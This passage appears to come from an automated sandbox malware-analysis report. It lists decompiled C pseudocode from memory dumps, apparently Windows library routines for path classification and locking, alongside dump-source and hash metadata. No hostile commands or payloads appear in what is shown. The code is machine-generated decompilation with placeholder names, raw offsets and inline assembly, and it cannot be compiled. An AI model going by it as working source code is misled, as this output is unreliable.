                        															_t263 = _t528 - 0x8c;
                        															 *_t263 =  *(_t528 - 0x8c) - 1;
                        															__eflags =  *_t263;
                        															_t479 =  *(_t528 - 0x78);
                        														} while ( *_t263 != 0);
                        														goto L87;
                        													}
                        												}
                        											} else {
                        												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                        												 *(_t528 - 0xa2) = _t392;
                        												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                        												__eflags = _t469;
                        												while(1) {
                        													 *(_t528 - 0xe4) = _t511;
                        													__eflags = _t392;
                        													_t393 = _t427;
                        													if(_t392 != 0) {
                        														_t393 =  *((intOrPtr*)(_t469 + 4));
                        													}
                        													_t395 = (_t393 & 0x000000ff) - _t427;
                        													__eflags = _t395;
                        													if(_t395 == 0) {
                        														_t511 = _t511 +  *_t469;
                        														__eflags = _t511;
                        													} else {
                        														_t398 = _t395 - 1;
                        														__eflags = _t398;
                        														if(_t398 == 0) {
                        															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                        															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                        														} else {
                        															__eflags = _t398 == 1;
                        															if(_t398 == 1) {
                        																 *(_t528 - 0xa8) =  *(_t469 - 8);
                        																_t402 =  *_t469 & 0x0000ffff;
                        																 *(_t528 - 0xac) = _t402;
                        																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                        															}
                        														}
                        													}
                        													__eflags = _t511 -  *(_t528 - 0xe4);
                        													if(_t511 <  *(_t528 - 0xe4)) {
                        														break;
                        													}
                        													_t397 =  *(_t528 - 0x88) + 1;
                        													 *(_t528 - 0x88) = _t397;
                        													_t469 = _t469 + 0x10;
                        													__eflags = _t397 -  *(_t528 + 0x1c);
                        													_t392 =  *(_t528 - 0xa2);
                        													if(_t397 <  *(_t528 + 0x1c)) {
                        														continue;
                        													}
                        													goto L45;
                        												}
                        												_t475 = 0x216;
                        												 *(_t528 - 0x74) = 0x216;
                        												goto L45;
                        											}
                        										} else {
                        											asm("lock dec dword [eax+ecx*8+0x4]");
                        											goto L16;
                        										}
                        									}
                        									_t491 = E02BC4CAB(_t306, _t528 - 0xa4);
                        									 *(_t528 - 0x74) = _t491;
                        									__eflags = _t491;
                        									if(_t491 != 0) {
                        										goto L91;
                        									} else {
                        										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                        										goto L20;
                        									}
                        								}
                        								L16:
                        								 *(_t528 - 0x74) = 0x1069;
                        								L93:
                        								_t298 =  *(_t528 - 0xd0) + 1;
                        								 *(_t528 - 0xd0) = _t298;
                        								_t474 = _t474 + _t511;
                        								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                        								_t494 = 4;
                        								__eflags = _t298 - _t494;
                        								if(_t298 >= _t494) {
                        									goto L100;
                        								}
                        								_t494 =  *(_t528 - 0xcc);
                        								_t435 = _t298;
                        								continue;
                        							}
                        							__eflags = _t494[2] | _t494[3];
                        							if((_t494[2] | _t494[3]) == 0) {
                        								goto L15;
                        							}
                        							goto L12;
                        						}
                        						__eflags = _t301;
                        						if(_t301 != 0) {
                        							goto L92;
                        						}
                        						goto L10;
                        						L92:
                        						goto L93;
                        					}
                        				} else {
                        					_push(0x57);
                        					L101:
                        					return E02B4D130(_t427, _t494, _t511);
                        				}
                        			}


                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8540289a6accf637682ad350b3b3fa517869d00988de88e1b5365ea027515906
                        • Instruction ID: 82c5a0c2006e853b14ec6b2a43d4b067779e4d47dc108c2a873fb0dd343c9a52
                        • Opcode Fuzzy Hash: 8540289a6accf637682ad350b3b3fa517869d00988de88e1b5365ea027515906
                        • Instruction Fuzzy Hash: CF422875D10229CFDB24CF68C880BA9B7B5FF89304F2481EED959AB242D774A985CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02B14120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                        				signed int _v8;
                        				void* _v20;
                        				signed int _v24;
                        				char _v532;
                        				char _v540;
                        				signed short _v544;
                        				signed int _v548;
                        				signed short* _v552;
                        				signed short _v556;
                        				signed short* _v560;
                        				signed short* _v564;
                        				signed short* _v568;
                        				void* _v570;
                        				signed short* _v572;
                        				signed short _v576;
                        				signed int _v580;
                        				char _v581;
                        				void* _v584;
                        				unsigned int _v588;
                        				signed short* _v592;
                        				void* _v597;
                        				void* _v600;
                        				void* _v604;
                        				void* _v609;
                        				void* _v616;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				unsigned int _t161;
                        				signed int _t162;
                        				unsigned int _t163;
                        				void* _t169;
                        				signed short _t173;
                        				signed short _t177;
                        				signed short _t181;
                        				unsigned int _t182;
                        				signed int _t185;
                        				signed int _t213;
                        				signed int _t225;
                        				short _t233;
                        				signed char _t234;
                        				signed int _t242;
                        				signed int _t243;
                        				signed int _t244;
                        				signed int _t245;
                        				signed int _t250;
                        				void* _t251;
                        				signed short* _t254;
                        				void* _t255;
                        				signed int _t256;
                        				void* _t257;
                        				signed short* _t260;
                        				signed short _t265;
                        				signed short* _t269;
                        				signed short _t271;
                        				signed short** _t272;
                        				signed short* _t275;
                        				signed short _t282;
                        				signed short _t283;
                        				signed short _t290;
                        				signed short _t299;
                        				signed short _t307;
                        				signed int _t308;
                        				signed short _t311;
                        				signed short* _t315;
                        				signed short _t316;
                        				void* _t317;
                        				void* _t319;
                        				signed short* _t321;
                        				void* _t322;
                        				void* _t323;
                        				unsigned int _t324;
                        				signed int _t325;
                        				void* _t326;
                        				signed int _t327;
                        				signed int _t329;
                        
                        				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                        				_v8 =  *0x2bed360 ^ _t329;
                        				_t157 = _a8;
                        				_t321 = _a4;
                        				_t315 = __edx;
                        				_v548 = __ecx;
                        				_t305 = _a20;
                        				_v560 = _a12;
                        				_t260 = _a16;
                        				_v564 = __edx;
                        				_v580 = _a8;
                        				_v572 = _t260;
                        				_v544 = _a20;
                        				if( *__edx <= 8) {
                        					L3:
                        					if(_t260 != 0) {
                        						 *_t260 = 0;
                        					}
                        					_t254 =  &_v532;
                        					_v588 = 0x208;
                        					if((_v548 & 0x00000001) != 0) {
                        						_v556 =  *_t315;
                        						_v552 = _t315[2];
                        						_t161 = E02B2F232( &_v556);
                        						_t316 = _v556;
                        						_v540 = _t161;
                        						goto L17;
                        					} else {
                        						_t306 = 0x208;
                        						_t298 = _t315;
                        						_t316 = E02B16E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                        						if(_t316 == 0) {
                        							L68:
                        							_t322 = 0xc0000033;
                        							goto L39;
                        						} else {
                        							while(_v581 == 0) {
                        								_t233 = _v588;
                        								if(_t316 > _t233) {
                        									_t234 = _v548;
                        									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                        										_t254 = L02B14620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                        										if(_t254 == 0) {
                        											_t169 = 0xc0000017;
                        										} else {
                        											_t298 = _v564;
                        											_v588 = _t316;
                        											_t306 = _t316;
                        											_t316 = E02B16E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                        											if(_t316 != 0) {
                        												continue;
                        											} else {
                        												goto L68;
                        											}
                        										}
                        									} else {
                        										goto L90;
                        									}
                        								} else {
                        									_v556 = _t316;
                        									 *((short*)(_t329 + 0x32)) = _t233;
                        									_v552 = _t254;
                        									if(_t316 < 2) {
                        										L11:
                        										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                        											_t161 = 5;
                        										} else {
                        											if(_t316 < 6) {
                        												L87:
                        												_t161 = 3;
                        											} else {
                        												_t242 = _t254[2] & 0x0000ffff;
                        												if(_t242 != 0x5c) {
                        													if(_t242 == 0x2f) {
                        														goto L16;
                        													} else {
                        														goto L87;
                        													}
                        													goto L101;
                        												} else {
                        													L16:
                        													_t161 = 2;
                        												}
                        											}
                        										}
                        									} else {
                        										_t243 =  *_t254 & 0x0000ffff;
                        										if(_t243 == 0x5c || _t243 == 0x2f) {
                        											if(_t316 < 4) {
                        												L81:
                        												_t161 = 4;
                        												goto L17;
                        											} else {
                        												_t244 = _t254[1] & 0x0000ffff;
                        												if(_t244 != 0x5c) {
                        													if(_t244 == 0x2f) {
                        														goto L60;
                        													} else {
                        														goto L81;
                        													}
                        												} else {
                        													L60:
                        													if(_t316 < 6) {
                        														L83:
                        														_t161 = 1;
                        														goto L17;
                        													} else {
                        														_t245 = _t254[2] & 0x0000ffff;
                        														if(_t245 != 0x2e) {
                        															if(_t245 == 0x3f) {
                        																goto L62;
                        															} else {
                        																goto L83;
                        															}
                        														} else {
                        															L62:
                        															if(_t316 < 8) {
                        																L85:
                        																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                        																goto L17;
                        															} else {
                        																_t250 = _t254[3] & 0x0000ffff;
                        																if(_t250 != 0x5c) {
                        																	if(_t250 == 0x2f) {
                        																		goto L64;
                        																	} else {
                        																		goto L85;
                        																	}
                        																} else {
                        																	L64:
                        																	_t161 = 6;
                        																	goto L17;
                        																}
                        															}
                        														}
                        													}
                        												}
                        											}
                        											goto L101;
                        										} else {
                        											goto L11;
                        										}
                        									}
                        									L17:
                        									if(_t161 != 2) {
                        										_t162 = _t161 - 1;
                        										if(_t162 > 5) {
                        											goto L18;
                        										} else {
                        											switch( *((intOrPtr*)(_t162 * 4 +  &M02B145F8))) {
                        												case 0:
                        													_v568 = 0x2ad1078;
                        													__eax = 2;
                        													goto L20;
                        												case 1:
                        													goto L18;
                        												case 2:
                        													_t163 = 4;
                        													goto L19;
                        											}
                        										}
                        										goto L41;
                        									} else {
                        										L18:
                        										_t163 = 0;
                        										L19:
                        										_v568 = 0x2ad11c4;
                        									}
                        									L20:
                        									_v588 = _t163;
                        									_v564 = _t163 + _t163;
                        									_t306 =  *_v568 & 0x0000ffff;
                        									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                        									_v576 = _t265;
                        									if(_t265 > 0xfffe) {
                        										L90:
                        										_t322 = 0xc0000106;
                        									} else {
                        										if(_t321 != 0) {
                        											if(_t265 > (_t321[1] & 0x0000ffff)) {
                        												if(_v580 != 0) {
                        													goto L23;
                        												} else {
                        													_t322 = 0xc0000106;
                        													goto L39;
                        												}
                        											} else {
                        												_t177 = _t306;
                        												goto L25;
                        											}
                        											goto L101;
                        										} else {
                        											if(_v580 == _t321) {
                        												_t322 = 0xc000000d;
                        											} else {
                        												L23:
                        												_t173 = L02B14620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                        												_t269 = _v592;
                        												_t269[2] = _t173;
                        												if(_t173 == 0) {
                        													_t322 = 0xc0000017;
                        												} else {
                        													_t316 = _v556;
                        													 *_t269 = 0;
                        													_t321 = _t269;
                        													_t269[1] = _v576;
                        													_t177 =  *_v568 & 0x0000ffff;
                        													L25:
                        													_v580 = _t177;
                        													if(_t177 == 0) {
                        														L29:
                        														_t307 =  *_t321 & 0x0000ffff;
                        													} else {
                        														_t290 =  *_t321 & 0x0000ffff;
                        														_v576 = _t290;
                        														_t310 = _t177 & 0x0000ffff;
                        														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                        															_t307 =  *_t321 & 0xffff;
                        														} else {
                        															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                        															E02B3F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                        															_t329 = _t329 + 0xc;
                        															_t311 = _v580;
                        															_t225 =  *_t321 + _t311 & 0x0000ffff;
                        															 *_t321 = _t225;
                        															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                        																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                        															}
                        															goto L29;
                        														}
                        													}
                        													_t271 = _v556 - _v588 + _v588;
                        													_v580 = _t307;
                        													_v576 = _t271;
                        													if(_t271 != 0) {
                        														_t308 = _t271 & 0x0000ffff;
                        														_v588 = _t308;
                        														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                        															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                        															E02B3F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                        															_t329 = _t329 + 0xc;
                        															_t213 =  *_t321 + _v576 & 0x0000ffff;
                        															 *_t321 = _t213;
                        															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                        																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                        															}
                        														}
                        													}
                        													_t272 = _v560;
                        													if(_t272 != 0) {
                        														 *_t272 = _t321;
                        													}
                        													_t306 = 0;
                        													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                        													_t275 = _v572;
                        													if(_t275 != 0) {
                        														_t306 =  *_t275;
                        														if(_t306 != 0) {
                        															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                        														}
                        													}
                        													_t181 = _v544;
                        													if(_t181 != 0) {
                        														 *_t181 = 0;
                        														 *((intOrPtr*)(_t181 + 4)) = 0;
                        														 *((intOrPtr*)(_t181 + 8)) = 0;
                        														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                        														if(_v540 == 5) {
                        															_t182 = E02AF52A5(1);
                        															_v588 = _t182;
                        															if(_t182 == 0) {
                        																E02B0EB70(1, 0x2be79a0);
                        																goto L38;
                        															} else {
                        																_v560 = _t182 + 0xc;
                        																_t185 = E02B0AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                        																if(_t185 == 0) {
                        																	_t324 = _v588;
                        																	goto L97;
                        																} else {
                        																	_t306 = _v544;
                        																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                        																	 *(_t306 + 4) = _t282;
                        																	_v576 = _t282;
                        																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                        																	 *_t306 = _t325;
                        																	if( *_t282 == 0x5c) {
                        																		_t149 = _t325 - 2; // -2
                        																		_t283 = _t149;
                        																		 *_t306 = _t283;
                        																		 *(_t306 + 4) = _v576 + 2;
                        																		_t185 = _t283 & 0x0000ffff;
                        																	}
                        																	_t324 = _v588;
                        																	 *(_t306 + 2) = _t185;
                        																	if((_v548 & 0x00000002) == 0) {
                        																		L97:
                        																		asm("lock xadd [esi], eax");
                        																		if((_t185 | 0xffffffff) == 0) {
                        																			_push( *((intOrPtr*)(_t324 + 4)));
                        																			E02B395D0();
                        																			L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                        																		}
                        																	} else {
                        																		 *(_t306 + 0xc) = _t324;
                        																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                        																	}
                        																	goto L38;
                        																}
                        															}
                        															goto L41;
                        														}
                        													}
                        													L38:
                        													_t322 = 0;
                        												}
                        											}
                        										}
                        									}
                        									L39:
                        									if(_t254 !=  &_v532) {
                        										L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                        									}
                        									_t169 = _t322;
                        								}
                        								goto L41;
                        							}
                        							goto L68;
                        						}
                        					}
                        					L41:
                        					_pop(_t317);
                        					_pop(_t323);
                        					_pop(_t255);
                        					return E02B3B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                        				} else {
                        					_t299 = __edx[2];
                        					if( *_t299 == 0x5c) {
                        						_t256 =  *(_t299 + 2) & 0x0000ffff;
                        						if(_t256 != 0x5c) {
                        							if(_t256 != 0x3f) {
                        								goto L2;
                        							} else {
                        								goto L50;
                        							}
                        						} else {
                        							L50:
                        							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                        								goto L2;
                        							} else {
                        								_t251 = E02B33D43(_t315, _t321, _t157, _v560, _v572, _t305);
                        								_pop(_t319);
                        								_pop(_t326);
                        								_pop(_t257);
                        								return E02B3B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                        							}
                        						}
                        					} else {
                        						L2:
                        						_t260 = _v572;
                        						goto L3;
                        					}
                        				}
                        				L101:
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d32d1ef3a84acb86658233788bc98fad66d1e60775f98216df6bccd9a13bd3d2
                        • Instruction ID: c3284723922305e75560402e1f471cbe64be5b961224247573a9d351e472c8b4
                        • Opcode Fuzzy Hash: d32d1ef3a84acb86658233788bc98fad66d1e60775f98216df6bccd9a13bd3d2
                        • Instruction Fuzzy Hash: 49F16F705082518BC718CF19C480B3AB7F2FF88758F9489AEF896CB250E735D995CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02B220A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                        				signed int _v16;
                        				signed int _v20;
                        				signed char _v24;
                        				intOrPtr _v28;
                        				signed int _v32;
                        				void* _v36;
                        				char _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				unsigned int _v60;
                        				char _v64;
                        				unsigned int _v68;
                        				signed int _v72;
                        				char _v73;
                        				signed int _v74;
                        				char _v75;
                        				signed int _v76;
                        				void* _v81;
                        				void* _v82;
                        				void* _v89;
                        				void* _v92;
                        				void* _v97;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed char _t128;
                        				void* _t129;
                        				signed int _t130;
                        				void* _t132;
                        				signed char _t133;
                        				intOrPtr _t135;
                        				signed int _t137;
                        				signed int _t140;
                        				signed int* _t144;
                        				signed int* _t145;
                        				intOrPtr _t146;
                        				signed int _t147;
                        				signed char* _t148;
                        				signed int _t149;
                        				signed int _t153;
                        				signed int _t169;
                        				signed int _t174;
                        				signed int _t180;
                        				void* _t197;
                        				void* _t198;
                        				signed int _t201;
                        				intOrPtr* _t202;
                        				intOrPtr* _t205;
                        				signed int _t210;
                        				signed int _t215;
                        				signed int _t218;
                        				signed char _t221;
                        				signed int _t226;
                        				char _t227;
                        				signed int _t228;
                        				void* _t229;
                        				unsigned int _t231;
                        				void* _t235;
                        				signed int _t240;
                        				signed int _t241;
                        				void* _t242;
                        				signed int _t246;
                        				signed int _t248;
                        				signed int _t252;
                        				signed int _t253;
                        				void* _t254;
                        				intOrPtr* _t256;
                        				intOrPtr _t257;
                        				unsigned int _t262;
                        				signed int _t265;
                        				void* _t267;
                        				signed int _t275;
                        
                        				_t198 = __ebx;
                        				_t267 = (_t265 & 0xfffffff0) - 0x48;
                        				_v68 = __ecx;
                        				_v73 = 0;
                        				_t201 = __edx & 0x00002000;
                        				_t128 = __edx & 0xffffdfff;
                        				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                        				_v72 = _t128;
                        				if((_t128 & 0x00000008) != 0) {
                        					__eflags = _t128 - 8;
                        					if(_t128 != 8) {
                        						L69:
                        						_t129 = 0xc000000d;
                        						goto L23;
                        					} else {
                        						_t130 = 0;
                        						_v72 = 0;
                        						_v75 = 1;
                        						L2:
                        						_v74 = 1;
                        						_t226 =  *0x2be8714; // 0x0
                        						if(_t226 != 0) {
                        							__eflags = _t201;
                        							if(_t201 != 0) {
                        								L62:
                        								_v74 = 1;
                        								L63:
                        								_t130 = _t226 & 0xffffdfff;
                        								_v72 = _t130;
                        								goto L3;
                        							}
                        							_v74 = _t201;
                        							__eflags = _t226 & 0x00002000;
                        							if((_t226 & 0x00002000) == 0) {
                        								goto L63;
                        							}
                        							goto L62;
                        						}
                        						L3:
                        						_t227 = _v75;
                        						L4:
                        						_t240 = 0;
                        						_v56 = 0;
                        						_t252 = _t130 & 0x00000100;
                        						if(_t252 != 0 || _t227 != 0) {
                        							_t240 = _v68;
                        							_t132 = E02B22EB0(_t240);
                        							__eflags = _t132 - 2;
                        							if(_t132 != 2) {
                        								__eflags = _t132 - 1;
                        								if(_t132 == 1) {
                        									goto L25;
                        								}
                        								__eflags = _t132 - 6;
                        								if(_t132 == 6) {
                        									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                        									if( *((short*)(_t240 + 4)) != 0x3f) {
                        										goto L40;
                        									}
                        									_t197 = E02B22EB0(_t240 + 8);
                        									__eflags = _t197 - 2;
                        									if(_t197 == 2) {
                        										goto L25;
                        									}
                        								}
                        								L40:
                        								_t133 = 1;
                        								L26:
                        								_t228 = _v75;
                        								_v56 = _t240;
                        								__eflags = _t133;
                        								if(_t133 != 0) {
                        									__eflags = _t228;
                        									if(_t228 == 0) {
                        										L43:
                        										__eflags = _v72;
                        										if(_v72 == 0) {
                        											goto L8;
                        										}
                        										goto L69;
                        									}
                        									_t133 = E02AF58EC(_t240);
                        									_t221 =  *0x2be5cac; // 0x16
                        									__eflags = _t221 & 0x00000040;
                        									if((_t221 & 0x00000040) != 0) {
                        										_t228 = 0;
                        										__eflags = _t252;
                        										if(_t252 != 0) {
                        											goto L43;
                        										}
                        										_t133 = _v72;
                        										goto L7;
                        									}
                        									goto L43;
                        								} else {
                        									_t133 = _v72;
                        									goto L6;
                        								}
                        							}
                        							L25:
                        							_t133 = _v73;
                        							goto L26;
                        						} else {
                        							L6:
                        							_t221 =  *0x2be5cac; // 0x16
                        							L7:
                        							if(_t133 != 0) {
                        								__eflags = _t133 & 0x00001000;
                        								if((_t133 & 0x00001000) != 0) {
                        									_t133 = _t133 | 0x00000a00;
                        									__eflags = _t221 & 0x00000004;
                        									if((_t221 & 0x00000004) != 0) {
                        										_t133 = _t133 | 0x00000400;
                        									}
                        								}
                        								__eflags = _t228;
                        								if(_t228 != 0) {
                        									_t133 = _t133 | 0x00000100;
                        								}
                        								_t229 = E02B34A2C(0x2be6e40, 0x2b34b30, _t133, _t240);
                        								__eflags = _t229;
                        								if(_t229 == 0) {
                        									_t202 = _a20;
                        									goto L100;
                        								} else {
                        									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                        									L15:
                        									_t202 = _a20;
                        									 *_t202 = _t135;
                        									if(_t229 == 0) {
                        										L100:
                        										 *_a4 = 0;
                        										_t137 = _a8;
                        										__eflags = _t137;
                        										if(_t137 != 0) {
                        											 *_t137 = 0;
                        										}
                        										 *_t202 = 0;
                        										_t129 = 0xc0000017;
                        										goto L23;
                        									} else {
                        										_t242 = _a16;
                        										if(_t242 != 0) {
                        											_t254 = _t229;
                        											memcpy(_t242, _t254, 0xd << 2);
                        											_t267 = _t267 + 0xc;
                        											_t242 = _t254 + 0x1a;
                        										}
                        										_t205 = _a4;
                        										_t25 = _t229 + 0x48; // 0x48
                        										 *_t205 = _t25;
                        										_t140 = _a8;
                        										if(_t140 != 0) {
                        											__eflags =  *((char*)(_t267 + 0xa));
                        											if( *((char*)(_t267 + 0xa)) != 0) {
                        												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                        											} else {
                        												 *_t140 = 0;
                        											}
                        										}
                        										_t256 = _a12;
                        										if(_t256 != 0) {
                        											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                        										}
                        										_t257 =  *_t205;
                        										_v48 = 0;
                        										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                        										_v56 = 0;
                        										_v52 = 0;
                        										_t144 =  *( *[fs:0x30] + 0x50);
                        										if(_t144 != 0) {
                        											__eflags =  *_t144;
                        											if( *_t144 == 0) {
                        												goto L20;
                        											}
                        											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                        											goto L21;
                        										} else {
                        											L20:
                        											_t145 = 0x7ffe0384;
                        											L21:
                        											if( *_t145 != 0) {
                        												_t146 =  *[fs:0x30];
                        												__eflags =  *(_t146 + 0x240) & 0x00000004;
                        												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                        													_t147 = E02B17D50();
                        													__eflags = _t147;
                        													if(_t147 == 0) {
                        														_t148 = 0x7ffe0385;
                        													} else {
                        														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                        													}
                        													__eflags =  *_t148 & 0x00000020;
                        													if(( *_t148 & 0x00000020) != 0) {
                        														_t149 = _v72;
                        														__eflags = _t149;
                        														if(__eflags == 0) {
                        															_t149 = 0x2ad5c80;
                        														}
                        														_push(_t149);
                        														_push( &_v48);
                        														 *((char*)(_t267 + 0xb)) = E02B2F6E0(_t198, _t242, _t257, __eflags);
                        														_push(_t257);
                        														_push( &_v64);
                        														_t153 = E02B2F6E0(_t198, _t242, _t257, __eflags);
                        														__eflags =  *((char*)(_t267 + 0xb));
                        														if( *((char*)(_t267 + 0xb)) != 0) {
                        															__eflags = _t153;
                        															if(_t153 != 0) {
                        																__eflags = 0;
                        																E02B77016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                        																L02B12400(_t267 + 0x20);
                        															}
                        															L02B12400( &_v64);
                        														}
                        													}
                        												}
                        											}
                        											_t129 = 0;
                        											L23:
                        											return _t129;
                        										}
                        									}
                        								}
                        							}
                        							L8:
                        							_t275 = _t240;
                        							if(_t275 != 0) {
                        								_v73 = 0;
                        								_t253 = 0;
                        								__eflags = 0;
                        								L29:
                        								_push(0);
                        								_t241 = E02B22397(_t240);
                        								__eflags = _t241;
                        								if(_t241 == 0) {
                        									_t229 = 0;
                        									L14:
                        									_t135 = 0;
                        									goto L15;
                        								}
                        								__eflags =  *((char*)(_t267 + 0xb));
                        								 *(_t241 + 0x34) = 1;
                        								if( *((char*)(_t267 + 0xb)) != 0) {
                        									E02B12280(_t134, 0x2be8608);
                        									__eflags =  *0x2be6e48 - _t253; // 0x0
                        									if(__eflags != 0) {
                        										L48:
                        										_t253 = 0;
                        										__eflags = 0;
                        										L49:
                        										E02B0FFB0(_t198, _t241, 0x2be8608);
                        										__eflags = _t253;
                        										if(_t253 != 0) {
                        											L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                        										}
                        										goto L31;
                        									}
                        									 *0x2be6e48 = _t241;
                        									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                        									__eflags = _t253;
                        									if(_t253 != 0) {
                        										_t57 = _t253 + 0x34;
                        										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                        										__eflags =  *_t57;
                        										if( *_t57 == 0) {
                        											goto L49;
                        										}
                        									}
                        									goto L48;
                        								}
                        								L31:
                        								_t229 = _t241;
                        								goto L14;
                        							}
                        							_v73 = 1;
                        							_v64 = _t240;
                        							asm("lock bts dword [esi], 0x0");
                        							if(_t275 < 0) {
                        								_t231 =  *0x2be8608; // 0x0
                        								while(1) {
                        									_v60 = _t231;
                        									__eflags = _t231 & 0x00000001;
                        									if((_t231 & 0x00000001) != 0) {
                        										goto L76;
                        									}
                        									_t73 = _t231 + 1; // 0x1
                        									_t210 = _t73;
                        									asm("lock cmpxchg [edi], ecx");
                        									__eflags = _t231 - _t231;
                        									if(_t231 != _t231) {
                        										L92:
                        										_t133 = E02B26B90(_t210,  &_v64);
                        										_t262 =  *0x2be8608; // 0x0
                        										L93:
                        										_t231 = _t262;
                        										continue;
                        									}
                        									_t240 = _v56;
                        									goto L10;
                        									L76:
                        									_t169 = E02B2E180(_t133);
                        									__eflags = _t169;
                        									if(_t169 != 0) {
                        										_push(0xc000004b);
                        										_push(0xffffffff);
                        										E02B397C0();
                        										_t231 = _v68;
                        									}
                        									_v72 = 0;
                        									_v24 =  *( *[fs:0x18] + 0x24);
                        									_v16 = 3;
                        									_v28 = 0;
                        									__eflags = _t231 & 0x00000002;
                        									if((_t231 & 0x00000002) == 0) {
                        										_v32 =  &_v36;
                        										_t174 = _t231 >> 4;
                        										__eflags = 1 - _t174;
                        										_v20 = _t174;
                        										asm("sbb ecx, ecx");
                        										_t210 = 3 |  &_v36;
                        										__eflags = _t174;
                        										if(_t174 == 0) {
                        											_v20 = 0xfffffffe;
                        										}
                        									} else {
                        										_v32 = 0;
                        										_v20 = 0xffffffff;
                        										_v36 = _t231 & 0xfffffff0;
                        										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                        										_v72 =  !(_t231 >> 2) & 0xffffff01;
                        									}
                        									asm("lock cmpxchg [edi], esi");
                        									_t262 = _t231;
                        									__eflags = _t262 - _t231;
                        									if(_t262 != _t231) {
                        										goto L92;
                        									} else {
                        										__eflags = _v72;
                        										if(_v72 != 0) {
                        											E02B3006A(0x2be8608, _t210);
                        										}
                        										__eflags =  *0x7ffe036a - 1;
                        										if(__eflags <= 0) {
                        											L89:
                        											_t133 =  &_v16;
                        											asm("lock btr dword [eax], 0x1");
                        											if(__eflags >= 0) {
                        												goto L93;
                        											} else {
                        												goto L90;
                        											}
                        											do {
                        												L90:
                        												_push(0);
                        												_push(0x2be8608);
                        												E02B3B180();
                        												_t133 = _v24;
                        												__eflags = _t133 & 0x00000004;
